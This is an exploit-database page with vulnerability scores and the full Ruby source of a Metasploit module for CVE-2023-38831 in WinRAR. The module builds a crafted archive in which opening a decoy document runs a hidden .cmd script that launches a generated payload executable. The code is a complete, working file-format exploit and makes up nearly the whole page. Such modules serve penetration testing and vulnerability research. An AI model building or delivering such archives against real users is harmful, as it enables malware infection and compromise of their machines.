WinRAR Remote Code Execution Exploit

2023-09-1100:00:00

metasploit

0day.today

187

winrar

cve-2023-38831

exploit

crafted rar file

code execution

metasploit

remote

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.192 Low

EPSS

Percentile

96.3%

JSON

This Metasploit module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WinRAR CVE-2023-38831 Exploit',
        'Description' => %q{
          This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its
          embedded document, the decoy document is executed, leading to code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Alexander "xaitax" Hagenah'],
        'References' => [
          ['CVE', '2023-38831'],
          ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],
          ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']
        ],
        'Platform' => ['win'],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Targets' => [['Windows', {}]],
        'Payload' => {
          'DisableNops' => true
        },
        'DisclosureDate' => '2023-08-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
    ])

    register_advanced_options([
      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])
    ])
  end

  def exploit
    Dir.mktmpdir do |temp_dir|
      output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])
      input_file = datastore['INPUT_FILE']
      decoy_name = File.basename(input_file)
      decoy_ext = ".#{File.extname(input_file)[1..]}"
      payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'

      decoy_dir = File.join(temp_dir, "#{decoy_name}A")
      Dir.mkdir(decoy_dir)

      payload_path = File.join(decoy_dir, payload_name)
      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }

      bat_script = <<~BAT
        @echo off
        start "" "%~dp0#{payload_name}"
        start "" "%~dp0#{decoy_name}"
      BAT

      bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")
      File.write(bat_path, bat_script)

      FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))

      zip_path = File.join(temp_dir, 'template.zip')
      Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
        zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
        zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
        zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
      end

      content = File.binread(zip_path)
      content.gsub!(decoy_ext + 'A', decoy_ext + ' ')
      content.gsub!(decoy_ext + 'B', decoy_ext + ' ')

      File.binwrite(output_rar, content)

      print_good("Created #{output_rar}")
    end
  end

end